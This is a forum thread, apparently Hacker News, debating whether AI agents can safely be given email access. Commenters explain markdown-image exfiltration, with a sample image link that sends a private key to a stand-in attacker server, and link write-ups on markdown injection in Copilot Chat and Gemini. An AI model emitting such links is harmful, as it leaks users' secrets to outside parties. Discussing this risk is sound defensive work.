2 ms·
You still have to trust your executive assistant. I would never give someone I don't trust the ability to read and write emails for me.
by eli 7mo ago
You still have to trust your executive assistant. I would never give someone I don't trust the ability to read and write emails for me.
- mr_mitm 7mo agoIf this takes off, I wonder if platforms will start providing API tokens scoped for assistants. They have permissions for non destructive actions like reading mails, flagging important mails, creating drafts, moving to trash, but not more.
- eli 7mo agoHow does my email platform know which messages I want my agent to see and which are too sensitive? I don't see how it's possible to securely give an agent access to your inbox unless it has zero ability to exfiltrate (not sending mail, not making any external network requests). Even then, you need to be careful with artifacts generated by the agent because a markdown file could transmit data when rendered.
- oarsinsync 7mo ago> a markdown file could transmit data when rendered. This is a new threat vector to me. Can you tell me more?
- adamckay 7mo agoYour markdown file has an image that links to another server controlled by the attacker and the path/query parameters you're attempting to render contains sensitive data. ![](https://the-attacker.com/steal?private-key=abc123def
- eli 7mo agoNot hypothetical: https://checkmarx.com/zero-post/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini/ https://checkmarx.com/zero-post/exploiting-markdown-injectio...
- ackdesha 7mo agoYes. It’s kind of like giving power of attorney to Jeffery Epstein.
- nickthegreek 7mo agoSeems to be working out alright for old Wexner.